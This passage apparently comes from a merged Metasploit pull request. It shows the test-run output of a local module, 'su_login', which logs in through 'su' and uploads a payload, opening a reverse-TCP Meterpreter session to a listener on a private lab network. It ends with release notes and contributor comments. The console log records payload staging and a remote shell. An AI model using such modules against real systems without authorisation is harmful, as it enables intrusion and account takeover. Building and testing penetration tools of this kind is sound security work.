   LHOST  192.168.135.197  yes       The listen address (an interface may be specified)
   LPORT  4545             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux x86_64


msf6 exploit(linux/local/su_login) > run

[*] Started reverse TCP handler on 192.168.135.197:4545 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Uploading payload to target
[*] Attempting to login with su
[*] Using 'python3' to load exploit
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3008420 bytes) to 192.168.134.163
[*] Meterpreter session 5 opened (192.168.135.197:4545 -> 192.168.134.163:53332) at 2020-10-19 15:52:22 -0500

meterpreter > sysinfo
Computer     : 192.168.134.163
OS           : Ubuntu 18.04 (Linux 4.15.0-50-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: testuser @ ubuntu64-1804 (uid=1001, gid=1001, euid=1001, egid=1001)
meterpreter > 

```

2020-10-19 20:56 UTC, merged

2020-10-19 20:57 UTC, bwatters-r7 commented
# Release Notes
This PR adds a module to upload and execute a payload as another user leveraging the Linux `su` command.

2020-10-19 22:02 UTC, youkergav commented
Hurray! Thanks for all the great help and excellent code review. I hope to contribute to the project again in the future!